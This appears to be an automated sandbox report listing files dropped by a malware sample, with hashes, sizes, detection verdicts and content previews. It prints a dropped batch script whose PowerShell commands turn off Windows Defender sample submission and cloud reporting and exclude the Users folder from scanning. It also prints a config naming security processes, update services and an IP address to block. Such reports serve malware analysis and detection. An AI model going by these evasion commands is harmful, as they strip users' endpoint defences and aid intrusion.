Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....T.................@...................................a.....`... ..............................................................@..d...........................................`/..(....................................................text...(...........................`..`.data.............................@....rdata...^......`.................@..@.pdata..d....@.......(..............@..@.xdata.......P.......2..............@..@.bss....p....`...........................idata...............<..............@....CRT....`............R..............@....tls.................T..............@....reloc...............V..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	259
Entropy (8bit):	4.933902901538645
Encrypted:	false
SSDEEP:	6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
MD5:	261A842203ADB67547C83DE132C7A076
SHA1:	6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
SHA-256:	49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
SHA-512:	7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
Malicious:	true
Preview:	@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adl3rpvb.kiz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bk0bvscq.w15.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccoqzpbb.p3k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csxx31s3.jgv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fmymk3jc.xit.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltfi0pvo.yod.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfjfzw1j.cxy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvj4bko1.vwj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovhd124v.enx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vqxni0vi.5l3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wagdvozv.5zs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wamugexa.3oi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	6.298274541598319
Encrypted:	false
SSDEEP:	1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
MD5:	319865D78CC8DF6270E27521B8182BFF
SHA1:	716E70B00AA2D154367028DE896C7D76C9D24350
SHA-256:	A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
SHA-512:	78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....\|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................\|..............@....reloc...............~..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\installer.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3741
Entropy (8bit):	5.4923187442938435
Encrypted:	false
SSDEEP:	96:isYJ9VvDT0HU0Hn0H1OALeK0Hu0H+kQHR39P+X+o0HNVHuHP0HltHw:DiTbT000H0EALeK0O0TQxNPA+o0tVOvT
MD5:	02EE49AC3492CDAEA9C80E2B5AF5F32E
SHA1:	535DFC45AA4D2F362A36B4065E22D4BE68E9CE02
SHA-256:	67952B3F5705976E75A38B24DE2B9FA22A8A661896463BAE0E932B8F5E522A21
SHA-512:	0F1DF0F3B072D9CEE281105A2B94021BFFA0BBC0EADA115270AFA1734BB43A54761547CD578FE4D88C0F3D256BD4A32C91DE020D1BC95FA687094489A2150B1A
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-10

C:\Users\user\AppData\Local\Temp\wfpblk.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe
File Type:	Generic INItialization configuration [svc]
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.692426693515089
Encrypted:	false
SSDEEP:	3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
MD5:	E025B58CB2D118FAFAE00850EE91C5F9
SHA1:	DD23CE328F593AF74455F2C2F805B662466A1205
SHA-256:	897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
SHA-512:	5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
Malicious:	false
Preview:	[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..

C:\Users\user\AppData\Local\Temp\wfpblk.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23117
Entropy (8bit):	5.172648034825642
Encrypted:	false
SSDEEP:	384:ubbEbNQ6s69WS8vv88o888888888888j888888888888e88888888088888888AZ:ubbEbNQ6s69WS8vv88o888888888888g
MD5:	AC67E6A64AA8C32107191D464E0319CD
SHA1:	3708A88E715E55889153ADF85FD8A98B0CC6D3F2
SHA-256:	C4DA2A83B3232895465FD317F78FD8B41D7EF8C5486D364B3A7C1D9063398906
SHA-512:	A5E002B7EA5E4BD73FF4D6931C67CE51A359D1607E67952278D36A9C25E82FE5EC1607550C7CCDE291F24E9FD7DB66B4B86094187479DFA6AFCE4209A0A847E1
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_sec) -> Done

C:\Windows\Temp\2L2zlVsY

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8568
Entropy (8bit):	4.958673415285098
Encrypted:	false
SSDEEP:	96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:	27535CEE6740DFC50A78A0322415E67C
SHA1:	E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:	FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:	25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:	false
Preview:	## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

C:\Windows\Temp\6rRRlGVV

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9146880
Entropy (8bit):	6.674868432808522
Encrypted:	false
SSDEEP:	196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:	676064A5CC4729E609539F9C9BD9D427
SHA1:	F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:	77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:	4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

C:\Windows\Temp\Cw0MZxef

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

C:\Windows\Temp\ROF9A37w

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.2290767543196575
Encrypted:	false
SSDEEP:	1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
MD5:	4C086C8F48C4D0F8C20410E60340AEC9
SHA1:	77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
SHA-256:	0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
SHA-512:	CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

C:\Windows\Temp\TsG1eHIt

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	6.242846530333761
Encrypted:	false
SSDEEP:	1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
MD5:	FDCF93ACD089B505B524DDFA0FF947F9
SHA1:	A2BADA5807BA001758DBCE46DA634332A5CC14C2
SHA-256:	ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
SHA-512:	110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

C:\Windows\Temp\bMZx4vGr

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105984
Entropy (8bit):	6.2884725801282775
Encrypted:	false
SSDEEP:	1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
MD5:	91A0DD29773FBFB7112C5FCFF1873C13
SHA1:	E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
SHA-256:	AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
SHA-512:	F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

C:\Windows\Temp\eKTTDy2k

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.277217301921545
Encrypted:	false
SSDEEP:	1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
MD5:	D0F0423AEEE6B6FF6754D860603D46D0
SHA1:	A06F3B9605B3398BA68154DA39ADF26DDEE41743
SHA-256:	81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
SHA-512:	C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

C:\Windows\Temp\ogg99SMu

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.259370376612282
Encrypted:	false
SSDEEP:	1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
MD5:	7A8E8A0842D8D65713DEE5393E806755
SHA1:	AF6F3A52009FBF62C21A290EFC34A94C151B683E
SHA-256:	51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
SHA-512:	D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
